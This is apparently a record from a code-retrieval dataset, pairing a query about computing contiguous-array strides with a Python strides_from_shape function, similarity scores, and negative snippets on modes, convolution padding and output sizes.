tmode_Mode()\n self.selectionMode = selection_Mode()\n self.indentMode = indent_Mode()", "def all_modes(self):\n\n # Find \"post-proj all modes\"\n # Jump to first value, ignoring text.\n # Move through data, adding it to a list\n # continue onto next line.\n # Repeat until the following line is known to be empty.\n\n # output.dat is the psi4 output file.\n with open('output.dat', 'r') as file:\n lines = file.readlines()\n for count, line in enumerate(lines):\n if \"post-proj all modes\" in line:\n start_of_vals = count\n break\n else:\n raise EOFError('Cannot locate modes in output.dat file.')\n\n # Barring the first (and sometimes last) line, dat file has 6 values per row.\n end_of_vals = start_of_vals + (3 * len(self.molecule.molecule['input'])) // 6\n\n structures = lines[start_of_vals][24:].replace(\"'\", \"\").split()\n structures = structures[6:]\n\n for row in range(1, end_of_vals - start_of_vals):\n # Remove double strings and weird formatting.\n structures += lines[start_of_vals + row].replace(\"'\", \"\").replace(\"]\", \"\").split()\n\n all_modes = [float(val) for val in structures]\n\n return array(all_modes)", "def supported_modes(self):\n return [OFF, SYNC, CHARGE]", "def __iter__(self):\n\n for opt in self.eset:\n if self.bitflags & int(opt):\n yield opt", "def values(self):\n return self._modes.values()", "def op_modes(self):\n if self._supported_op_modes is None:\n key = self._get_state_key(SUPPORT_OPERATION_MODE)\n if not self.model_info.is_enum_type(key):\n self._supported_op_modes = []\n return []\n mapping = self.model_info.value(key).options\n mode_list = [e.value for e in DHumMode]\n self._supported_op_modes = [DHumMode(o).name for o in mapping.values() if o in mode_list]\n return self._supported_op_modes", "def preset_modes(self) -> List[str]:\n return self._support_presets", "def test_mode_digit():\n print('Testing mode_digit')\n\n # 
Cases given to test this problem\n assert_equals(1, hw1.mode_digit(12121))\n assert_equals(0, hw1.mode_digit(0))\n assert_equals(2, hw1.mode_digit(-122))\n assert_equals(2, hw1.mode_digit(1211232231))\n\n # Additional cases to test numbers with same digit occurance numbers\n assert_equals(3, hw1.mode_digit(-333000221))\n assert_equals(4, hw1.mode_digit(440011))", "def getDisplayModes(self, obj):\n modes = []\n return modes", "def preset_modes(self):\n return self._preset_modes", "def chordmode():\n for token in consume():\n if source.inSelection and isinstance(token, tokenizer.Pitch):\n transpose(token, 0)", "def preset_modes(self) -> list:\n return self._preset_modes" ]
[ "0.62502277", "0.60794157", "0.594942", "0.5905437", "0.5903358", "0.5762716", "0.56345135", "0.5598813", "0.5586852", "0.5512914", "0.550523", "0.5503041", "0.54652876", "0.5426214", "0.54166454", "0.5404549", "0.53661305", "0.5359288", "0.5355193", "0.53164005", "0.5308114", "0.5291673", "0.5280105", "0.5267146", "0.5189662", "0.51687014", "0.5162793", "0.51604474", "0.51486546", "0.5143419" ]
0.68199724
0
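iter_mode() above depends on module-level names (cap, fmtdict, MODE, randitems) that the record does not include; they appear to belong to a buffer-format test harness. A self-contained sketch with minimal stand-ins for those names:

from random import randrange

MODE = 0                                    # stand-in index into cap[obj]
cap = {'ndarray': {MODE: ['@', '<', '>']}}  # stand-in: modes per object kind
fmtdict = {'@': 'bBhH', '<': 'hHiI', '>': 'hHiI'}   # stand-in: chars per mode

def randitems(n, obj, mode, char):
    # stand-in returning (format, items, item), mirroring the next record
    items = [randrange(128) for _ in range(n)]
    return mode + char, items, items[0]

def iter_mode(n, obj='ndarray'):
    for mode in cap[obj][MODE]:
        for char in fmtdict[mode]:
            yield randitems(n, obj, mode, char)

for fmt, items, item in iter_mode(3):
    print(fmt, items, item)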
Yield (format, items, item) for all possible modes and format characters plus one random compound format string.
def iter_format(nitems, testobj='ndarray'):
    for t in iter_mode(nitems, testobj):
        yield t
    if testobj != 'ndarray':
        return
    yield struct_items(nitems, testobj)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def makeNamesFromFormats(formats):\n i = getIter(formats)\n if not i:\n return\n\n try:\n c = 0\n item = i.next()\n while item:\n c = c +1\n name = 'c%s' % c\n if isinstance(item, str):\n yield name\n else:\n l = []\n for a in makeNamesFromFormats(item):\n l.append(a)\n yield (name, l)\n item = i.next()\n except StopIteration:\n pass", "def format(self, data):\r\n for name, value in sorted(data.items()):\r\n line = '{name} = {value}\\n'.format(\r\n name=name,\r\n value=value,\r\n )\r\n yield line", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def iter_mode(n, obj='ndarray'):\n for mode in cap[obj][MODE]:\n for char in fmtdict[mode]:\n yield randitems(n, obj, mode, char)", "def iter_mode(n, obj='ndarray'):\n for mode in cap[obj][MODE]:\n for char in fmtdict[mode]:\n yield randitems(n, obj, mode, char)", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def getFormatsFromDescr(descr):\n i = getIter(descr)\n if not i:\n return\n\n try:\n item = i.next()\n while item:\n item1 = item[1]\n if isinstance(item1, str):\n yield normalize_format(item1)\n else:\n l = []\n for j in getFormatsFromDescr(item1):\n l.append(j)\n yield l\n item = i.next()\n except StopIteration:\n pass", "def format(self, data):\r\n for name, value in sorted(data.items()):\r\n full_text = ': {name} : {value}'.format(\r\n name=name,\r\n value=value,\r\n )\r\n wrapped_text = textwrap.fill(\r\n full_text,\r\n initial_indent='',\r\n subsequent_indent=' ',\r\n width=self.max_width,\r\n )\r\n yield wrapped_text + '\\n'", "def format_basis_for_cfour(self, puream):\n text = ''\n cr = 1\n for fr in range(self.nfragments()):\n if self.fragment_types[fr] == 'Absent':\n pass\n else:\n for at in range(self.fragments[fr][0], self.fragments[fr][1] + 1):\n text += \"\"\"%s:P4_%d\\n\"\"\" % (self.symbol(at).upper(), cr)\n cr += 1\n text += '\\n'\n\n options = collections.defaultdict(lambda: collections.defaultdict(dict))\n options['CFOUR']['CFOUR_BASIS']['value'] = 'SPECIAL'\n options['CFOUR']['CFOUR_SPHERICAL']['value'] = puream\n\n options['CFOUR']['CFOUR_BASIS']['clobber'] = True\n options['CFOUR']['CFOUR_SPHERICAL']['clobber'] = True\n\n options['CFOUR']['CFOUR_BASIS']['superclobber'] = True\n options['CFOUR']['CFOUR_SPHERICAL']['superclobber'] = True\n\n return text, options", "def test_format_info_full1(self):\n\n # The spin info and expected string - covering all possible combinations.\n info = [\n # 5 bits of info.\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 
200, 'string': \"Molecule Ubi, residue Ala 10, spin N 200\"},\n\n # 4 bits of info.\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': \"Residue Ala 10, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': \"Molecule Ubi, residue 10, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Molecule Ubi, residue Ala, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, residue Ala 10, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, residue Ala 10, spin N\"},\n\n # 3 bits of info.\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': \"Residue 10, spin N 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Residue Ala, spin N 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Residue Ala 10, spin 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Residue Ala 10, spin N\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Molecule Ubi, spin N 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, residue 10, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, residue 10, spin N\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, residue Ala, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, residue Ala, spin N\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi, residue Ala 10\"},\n\n # 2 bits of info.\n {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': \"Spin N 200\"},\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': \"Residue 10, spin 200\"},\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': \"Residue 10, spin N\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Residue Ala, spin 200\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Residue Ala, spin N\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Residue Ala 10\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Molecule Ubi, spin 200\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Molecule Ubi, spin N\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi, residue 10\"},\n {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi, residue Ala\"},\n\n # 1 bit of info.\n {'mol_name': None, 'res_name': None, 
'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': \"Spin 200\"},\n {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': \"Spin N\"},\n {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': \"Residue 10\"},\n {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"Residue Ala\"},\n {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"Molecule Ubi\"},\n\n # 0 bits of info.\n {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': \"\"},\n ]\n\n # Printout.\n print(\"Checking %s combinations.\" % len(info))\n\n # Create and check each string.\n for i in range(len(info)):\n print(\" Checking %s\" % info[i])\n string = mol_res_spin.format_info_full(mol_name=info[i]['mol_name'], res_name=info[i]['res_name'], res_num=info[i]['res_num'], spin_name=info[i]['spin_name'], spin_num=info[i]['spin_num'])\n self.assertEqual(string, info[i]['string'])", "def register_format(recipe):\n afr = AFMFormatRecipe(recipe)\n formats_available.append(afr)\n # suffix\n if afr.suffix not in formats_by_suffix:\n formats_by_suffix[afr.suffix] = []\n formats_by_suffix[afr.suffix].append(afr)\n # mode\n if afr.mode not in formats_by_mode:\n formats_by_mode[afr.mode] = []\n formats_by_mode[afr.mode].append(afr)\n # supported extensions\n if afr.suffix not in supported_extensions: # avoid duplucates\n supported_extensions.append(afr.suffix)\n supported_extensions.sort()", "def iter_trans_tokens(self) -> Iterator[TransTokenSource]:\n yield from tkMarkdown.iter_tokens(self.glob_desc, f'items/{self.id}.desc')\n for version in self.versions.values():\n for style_id, variant in version.styles.items():\n yield from variant.iter_trans_tokens(f'items/{self.id}/{style_id}')", "def initFormat(self):\n self.formatList = self.splitText(self.format)", "def xephemFormat(self):\n line = []\n #Field 1: names\n names = [self.getName()]\n identifiers = self.getIdentifiers()\n if identifiers[0] is not None:\n names.append(identifiers[0])\n for i in range(1,4):\n if identifiers[i] is not None:\n names.extend(identifiers[i])\n line.append(\"|\".join(names))\n\n #Field 2: type designation\n objType = self.getType()\n if objType in (\"Galaxy Pair\", \"Galaxy Triplet\", \"Group of galaxies\"):\n line.append(\"f|A\")\n elif objType == \"Globular Cluster\":\n line.append(\"f|C\")\n elif objType == \"Double star\":\n line.append(\"f|D\")\n elif objType in (\"HII Ionized region\", \"Nebula\"):\n line.append(\"f|F\")\n elif objType == \"Galaxy\":\n if self.getHubble().startswith(\"S\"):\n line.append(\"f|G\")\n else:\n line.append(\"f|H\")\n elif objType == \"Dark Nebula\":\n line.append(\"f|K\")\n elif objType in (\"Emission Nebula\", \"Reflection Nebula\"):\n line.append(\"f|N\")\n elif objType in (\"Association of stars\", \"Open Cluster\"):\n line.append(\"f|O\")\n elif objType == \"Planetary Nebula\":\n line.append(\"f|P\")\n elif objType == \"Supernova remnant\":\n line.append(\"f|R\")\n elif objType == \"Star\":\n line.append(\"f|S\")\n elif objType == \"Star cluster + Nebula\":\n line.append(\"f|U\")\n else:\n line.append(\"f\")\n\n #Field 3: Right Ascension\n line.append(self.getRA())\n\n #Field 4: Declination\n line.append(self.getDec())\n\n #Field 5: Magnitude\n #We use the first available magnitude in the sequence b,v,j,h,k\n for mag in self.getMagnitudes():\n if mag is not None:\n 
line.append(str(mag))\n break\n\n #Field 6: optional Epoch, we let it empty\n line.append(\"\")\n\n #Field 7: Dimensions\n dimensions = []\n #Xephem format wants axes espressed in arcsec, we have arcmin\n for value in (self.getDimensions()[0],self.getDimensions()[1]):\n if value is not None:\n dimensions.append(str(value*60))\n else:\n dimensions.append(\"\")\n if self.getDimensions()[2] is not None:\n dimensions.append(str(value))\n else:\n dimensions.append(\"\")\n line.append(\"|\".join(dimensions))\n\n return \",\".join(line)", "def _translate_fmts(self):\n fmt_info = []\n fmt_append = fmt_info.append\n \n isvalid = self._is_valid_fmt\n typlist = self._typlist\n isstrvar = self._isstrvar\n default_fmts = self._default_fmts\n \n for i, fmt in enumerate(self._fmtlist):\n fmt = fmt.strip()\n \n iscalendar = (fmt[1] == 't' or fmt[1:3] == '-t')\n \n if iscalendar or not isvalid(fmt):\n if isstrvar(i):\n wid = min(typlist[i], 10)\n fmt_append(('s', \"{{:>{}s}}\".format(wid), wid))\n continue\n else:\n fmt = default_fmts[typlist[i]]\n \n last_char = fmt[-1]\n if last_char == 's': # string\n m = STR_FMT_RE.match(fmt)\n align, _, wid = m.group(1), m.group(2), m.group(3)\n new_align = (\"<\" if align == \"-\" \n else \"^\" if align == \"~\" else \">\")\n new = \"\".join((\"{:\", new_align, wid, \"s}\"))\n fmt_append(('s', new, int(wid)))\n elif last_char == 'H' or last_char == 'L': # binary\n fmt_append((last_char, fmt, int(fmt[1:-1])))\n elif last_char == 'x': # hexadecimal\n fmt_append(('x', fmt, 21))\n elif last_char in {'f', 'g', 'e', 'c'}: # numeric\n m = NUM_FMT_RE.match(fmt)\n align, _, wid, delim, prec, type, com = (m.group(1), m.group(2), \n m.group(3), m.group(4),\n m.group(5), m.group(6),\n m.group(7))\n aln = \"<\" if align == \"-\" else \">\"\n sep = \",\" if com is not None else \"\"\n if type == \"g\" and int(prec) == 0:\n new = \"\".join((\"{:\", aln, wid, sep, type, \"}\"))\n else:\n new = \"\".join((\"{:\", aln, wid, sep, \".\", prec, type, \"}\"))\n fmt_append((type, new, int(wid), delim, com))\n \n return fmt_info", "def format(self, item):\n raise NotImplementedError()", "def complete_opt_format(self, text, *_):\n return [t + \" \" for t in FORMATTERS if t.startswith(text)]", "def items(self):\n\t\tfor k, vs in self.multiple.items():\n\t\t\tfor v in vs: yield k, v", "def process_multi_body_format(commands):", "def apply_format(self, **format_vars):\n for construction_dict in (self._actions, self._conditions):\n for construction_key, construction_objs in construction_dict.iteritems():\n for construction in construction_objs:\n construction.apply_format(**format_vars)", "def format_pairs(\n items: typing.Iterable[typing.Tuple[TTextType, TTextType]]\n)-> typing.Iterator[TViewLine]:\n\n max_key_len = max((len(k[0]) for k in items), default=0)\n max_key_len = min((max_key_len, KEY_MAX), default=0)\n\n for key, value in items:\n if isinstance(key, bytes):\n\n key += b\":\"\n else:\n key += \":\"\n\n key = key.ljust(max_key_len + 2)\n\n yield [\n (\"header\", key),\n (\"text\", value)\n ]", "def blocks_iter(lines):\n type_ = None\n content = []\n termdef = re.compile(r\"^\\[([a-zA-Z_]+?)\\]$\")\n for line in lines:\n m = re.search(termdef, line)\n if m:\n if type_ != None and content:\n yield {\"type\": type_, \"content\": content[:]}\n type_ = m.group(1)\n content.clear()\n elif line.rstrip():\n content.append(line.rstrip())\n if content:\n yield {\"type\": type_, \"content\": content[:]}", "def print_all():\n\n for i, context in enumerate(CONTEXT_GROUP):\n print('Group 
#{0:d}'.format(i))\n\n charmap = context[\"charmap\"]\n assert charmap is None or isinstance(charmap, dict)\n\n for j, item in enumerate(StringGeneratorPascalStyle(context)):\n text = process_dakuten(get_text(item[1], charmap, None))\n print('{index:04X}:{address:06X}:{data}'.format(\n index=j,\n address=item[0],\n data=text))", "def _format_description(parser):\n for line in statemachine.string2lines(\n parser.description, tab_width=4, convert_whitespace=True):\n yield line", "def generador(*args):\t\r\n\tfor valor in args:\r\n\t\tyield valor **3, \"Ñereee\"", "def getDescr(names, formats):\n if not names:\n names = [item for item in makeNamesFromFormats(formats)]\n\n if type(formats) == str and type(names) == str:\n yield (names, formats)\n raise StopIteration\n\n if len(formats) != len(names):\n raise ValueError(\"\"\"The formats and names structure don't match!\"\"\")\n\n mix = zip(names, formats)\n i = getIter(mix)\n if not i:\n return\n\n try:\n (name, fmt) = i.next()\n while (name, fmt):\n if isinstance(name, str) and isinstance(fmt, str):\n yield (name, fmt)\n else:\n l = []\n for (a, b) in getDescr(name[1], fmt):\n l.append((a,b))\n yield (name[0], l)\n (name, fmt) = i.next()\n except StopIteration:\n pass", "def initFormat(self):\n self.formatList = []", "def to_iob(text: str, items: List[Instance]) -> List[str]:\n coding = [\"O\"] * len(text)\n for (s, e), label in items:\n b = f\"B-{label}\"\n i = f\"I-{label}\"\n coding[s] = b\n for x in range(s + 1, e):\n coding[x] = i\n\n return coding" ]
[ "0.59636045", "0.55950534", "0.5526537", "0.5526537", "0.5512344", "0.5512344", "0.5500678", "0.5500678", "0.54459256", "0.5404356", "0.54026484", "0.5386869", "0.5325779", "0.52617586", "0.52564883", "0.5248751", "0.5190863", "0.5118963", "0.50866807", "0.50587744", "0.505319", "0.50401896", "0.5019855", "0.5005864", "0.49884766", "0.49712908", "0.49700937", "0.49658278", "0.49511203", "0.49469626" ]
0.64417255
0
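iter_format() above chains iter_mode() and finishes with one compound format from struct_items(), which the record does not show. Reusing the stand-ins from the previous sketch and adding a hypothetical struct_items():

def struct_items(n, testobj):
    # hypothetical stand-in: one compound (struct) format plus matching items
    fmt = 'b h i'
    items = [(1, 2, 3)] * n
    return fmt, items, items[0]

def iter_format(nitems, testobj='ndarray'):
    for t in iter_mode(nitems, testobj):    # iter_mode from the sketch above
        yield t
    if testobj != 'ndarray':
        return
    yield struct_items(nitems, testobj)

for fmt, items, item in iter_format(2):
    print(fmt, items, item)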
Calculate strides of a contiguous array. Layout is 'C' or 'F' (Fortran).
def strides_from_shape(ndim, shape, itemsize, layout):
    if ndim == 0:
        return ()
    if layout == 'C':
        strides = list(shape[1:]) + [itemsize]
        for i in range(ndim-2, -1, -1):
            strides[i] *= strides[i+1]
    else:
        strides = [itemsize] + list(shape[:-1])
        for i in range(1, ndim):
            strides[i] *= strides[i-1]
    return strides
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def strides_from_shape(ndim, shape, itemsize, layout):\n if ndim == 0:\n return ()\n if layout == 'C':\n strides = list(shape[1:]) + [itemsize]\n for i in range(ndim - 2, -1, -1):\n strides[i] *= strides[i + 1]\n else:\n strides = [itemsize] + list(shape[:-1])\n for i in range(1, ndim):\n strides[i] *= strides[i - 1]\n return strides", "def strides(self):\n return self.initial_value.strides", "def elemstrides(self):\n return tuple(s // self.itemsize for s in self.strides)", "def stride_depth(self):\n\t\treturn self.strides_shape_param('D')", "def get_loop_strides(loop_order, i):\r\n var = sub[\"lv%i\" % i]\r\n r = []\r\n for index in loop_order:\r\n # Note: the stride variable is not declared for broadcasted variables\r\n if index != 'x':\r\n r.append(\"%(var)s_stride%(index)s\" % locals())\r\n else:\r\n r.append('0')\r\n return r", "def _calc_slices(X):\n\n n_rows = X.shape[0]\n slices = [n_rows // comm.size for _ in range(comm.size)]\n count = n_rows % comm.size\n for i in range(count):\n slices[i] += 1\n\n return np.array(slices, dtype=np.int64)", "def strides_shape_param(self, param):\n\t\tindex = self.variables['strides_format'].index(param)\n\t\treturn self.variables['strides'].shape[index]", "def stride_width(self):\n\t\treturn self.strides_shape_param('W')", "def stride(self):\n\t\treturn self.strides_shape_param('W')", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def num_conv_locations(input_shape, filter_shape, strides, padding):\n if len(input_shape) != 4 and len(input_shape) != 3:\n raise ValueError(\"input_shape must be length 4, corresponding to a Conv2D,\"\n \" or length 3, corresponding to a Conv1D.\")\n if len(input_shape) != len(filter_shape):\n raise ValueError(\"Inconsistent number of dimensions between input and \"\n \"filter for convolution\")\n\n if strides is None:\n if len(input_shape) == 4:\n strides = [1, 1, 1, 1]\n else:\n strides = [1, 1, 1]\n\n # Use negative integer division to implement 'rounding up'.\n # Formula for convolution shape taken from:\n # http://machinelearninguru.com/computer_vision/basics/convolution/convolution_layer.html\n if len(input_shape) == 3:\n if padding is not None and padding.lower() == \"valid\":\n out_width = -(-(input_shape[1] - filter_shape[0] + 1) // strides[1])\n else:\n out_width = -(-input_shape[1] // strides[1])\n\n return out_width\n else:\n if padding is not None and padding.lower() == \"valid\":\n out_height = -(-(input_shape[1] - filter_shape[0] + 1) // strides[1])\n out_width = -(-(input_shape[2] - filter_shape[1] + 1) // strides[2])\n else:\n out_height = -(-input_shape[1] // strides[1])\n out_width = -(-input_shape[2] // strides[2])\n\n return out_height * out_width", "def calc_pad_dims_2D(X_shape, out_dim, kernel_shape, stride, dilation=0):\n\tif not isinstance(X_shape, tuple):\n\t\traise ValueError(\"X_shape must be of type tuple\")\n\n\tif not isinstance(out_dim, tuple):\n\t\traise ValueError(\"out_dim must be of type tuple\")\n\n\tif not isinstance(kernel_shape, tuple):\n\t\traise ValueError(\"kernel_shape must be of type tuple\")\n\n\tif not isinstance(stride, int):\n\t\traise ValueError(\"stride must be of type int\")\n\n\td = dilation\n\tfr, fc = kernel_shape\n\tout_rows, out_cols = out_dim\n\tn_ex, in_rows, in_cols, in_ch = X_shape\n\n\t# update effective filter shape based on dilaltion factor\n\t_fr, _fc = fr * (d + 1) - d, 
fc * (d + 1) - d\n\tpr = int((stride * (out_rows - 1) + _fr - in_rows) / 2)\n\tpc = int((stride * (out_cols - 1) + _fc - in_cols) / 2)\n\tout_rows1 = int(1 + (in_rows + 2 * pr - _fr) / stride)\n\tout_cols1 = int(1 + (in_cols + 2 * pc - _fc) / stride)\n\n\t# add asymmetric padding pixels to right/bottom\n\tpr1, pr2 = pr, pr\n\tif out_rows1 == out_rows - 1:\n\t\tpr1, pr2 = pr, pr+1\n\telif out_rows1 != out_rows:\n\t\traise AssertionError\n\n\tif any(np.array([pr1, pr2, pc1, pc2]) < 0):\n\t\traise ValueError(\n\t\t\t\"padding cannot be less than 0. Get: {}\".format((pr1, pr2, pc1, pc2))\n\t\t\t)\n\treturn (pr1, pr2, pc1, pc2)", "def _get_same_padding_conv_nd(\n image_size: list[int], kernel_size: tuple[int, ...], dilation: tuple[int, ...], stride: tuple[int, ...]\n) -> list[int]:\n # get number of spatial dimensions, corresponds to kernel size length\n num_dims = len(kernel_size)\n\n # additional checks to populate dilation and stride (in case they are single entry tuples)\n if len(dilation) == 1:\n dilation = dilation * num_dims\n\n if len(stride) == 1:\n stride = stride * num_dims\n\n # equation to calculate (pad^+ + pad^-) size\n _pad_size: list[int] = [\n max((math.ceil(_i_s / _s) - 1) * _s + (_k_s - 1) * _d + 1 - _i_s, 0)\n for _i_s, _k_s, _d, _s in zip(image_size, kernel_size, dilation, stride)\n ]\n # distribute paddings into pad^+ and pad^- following Tensorflow's same padding strategy\n _paddings: list[tuple[int, int]] = [(_p // 2, _p - _p // 2) for _p in _pad_size]\n\n # unroll list of tuples to tuples, and then to list\n # reversed as nn.ConstantPadNd expects paddings starting with last dimension\n _paddings_ret: list[int] = [outer for inner in reversed(_paddings) for outer in inner]\n return _paddings_ret", "def compute_conv(in_size, kernel, stride, padding):\n return (in_size + 2 * padding - kernel) // stride + 1", "def calc_pad_dims_2D(X_shape, out_dim, kernel_shape, stride, dilation=0):\n if not isinstance(X_shape, tuple):\n raise ValueError(\"`X_shape` must be of type tuple\")\n\n if not isinstance(out_dim, tuple):\n raise ValueError(\"`out_dim` must be of type tuple\")\n\n if not isinstance(kernel_shape, tuple):\n raise ValueError(\"`kernel_shape` must be of type tuple\")\n\n if not isinstance(stride, int):\n raise ValueError(\"`stride` must be of type int\")\n\n d = dilation\n fr, fc = kernel_shape\n out_rows, out_cols = out_dim\n n_ex, in_rows, in_cols, in_ch = X_shape\n\n # update effective filter shape based on dilation factor\n _fr, _fc = fr * (d + 1) - d, fc * (d + 1) - d\n\n pr = int((stride * (out_rows - 1) + _fr - in_rows) / 2)\n pc = int((stride * (out_cols - 1) + _fc - in_cols) / 2)\n\n out_rows1 = int(1 + (in_rows + 2 * pr - _fr) / stride)\n out_cols1 = int(1 + (in_cols + 2 * pc - _fc) / stride)\n\n # add asymmetric padding pixels to right / bottom\n pr1, pr2 = pr, pr\n if out_rows1 == out_rows - 1:\n pr1, pr2 = pr, pr + 1\n elif out_rows1 != out_rows:\n raise AssertionError\n\n pc1, pc2 = pc, pc\n if out_cols1 == out_cols - 1:\n pc1, pc2 = pc, pc + 1\n elif out_cols1 != out_cols:\n raise AssertionError\n\n if any(np.array([pr1, pr2, pc1, pc2]) < 0):\n raise ValueError(\n \"Padding cannot be less than 0. 
Got: {}\".format((pr1, pr2, pc1, pc2))\n )\n return (pr1, pr2, pc1, pc2)", "def calc_conv_out_dims(X_shape, W_shape, stride=1, pad=0, dilation=0):\n\tdummy = np.zeros(X_shape)\n\ts, p, d = stride, pad, dilation\n\tif len(X_shape) == 3:\n\t\t_, p = pad1D(dummy, p)\n\t\tpw1, pw2 = p\n\t\tfw, in_ch, out_ch = W_shape\n\t\tn_ex, in_length, in_ch = X_shape\n\n\t\t_fw = fw * (d+1) - d\n\t\tout_length = (in_length + pw1 + pw2 - _fw) // s + 1\n\t\tout_dim = (n_ex, out_length, out_ch)\n\n\telif len(X_shape) == 4:\n\t\t_, p = pad2D(dummy, p)\n\t\tpr1, pr2, pc1, pc2 = p\n\t\tfr, fc, in_ch, out_ch = W_shape\n\t\tn_ex, in_rows, in_cols, in_ch = X_shape\n\n\t\t# adjust effective filter size to account for dilation\n\t\t_fr, _fc = fr * (d+1) - d, fc * (d+1) - d\n\t\tout_rows = (in_rows + pr1 + pr2 - _fr) // s + 1\n\t\tout_cols = (in_cols + pc1 + pc2 - _fc) // s + 1\n\t\tout_dims = (n_ex, out_rows, out_cols, out_ch)\n\telse:\n\t\traise ValueError(\"unrecognized number of the input dims: {}\".format(len(X_shape)))", "def dtype_stride( dtype, name = None ):\n if name:\n return dtype[ name ].itemsize\n else:\n return dtype.itemsize", "def _get_strides_and_dilation_rate(num_spatial_dims, strides, dilation_rate):\n if dilation_rate is None:\n dilation_rate = [1] * num_spatial_dims\n elif len(dilation_rate) != num_spatial_dims:\n raise ValueError(f\"`len(dilation_rate)` should be {num_spatial_dims}. \"\n f\"Received: dilation_rate={dilation_rate} of length \"\n f\"{len(dilation_rate)}\")\n dilation_rate = np.array(dilation_rate, dtype=np.int32)\n if np.any(dilation_rate < 1):\n raise ValueError(\"all values of `dilation_rate` must be positive. \"\n f\"Received: dilation_rate={dilation_rate}\")\n\n if strides is None:\n strides = [1] * num_spatial_dims\n elif len(strides) != num_spatial_dims:\n raise ValueError(f\"`len(strides)` should be {num_spatial_dims}. \"\n f\"Received: strides={strides} of length {len(strides)}\")\n strides = np.array(strides, dtype=np.int32)\n if np.any(strides < 1):\n raise ValueError(\"all values of `strides` must be positive. \"\n f\"Received: strides={strides}\")\n\n if np.any(strides > 1) and np.any(dilation_rate > 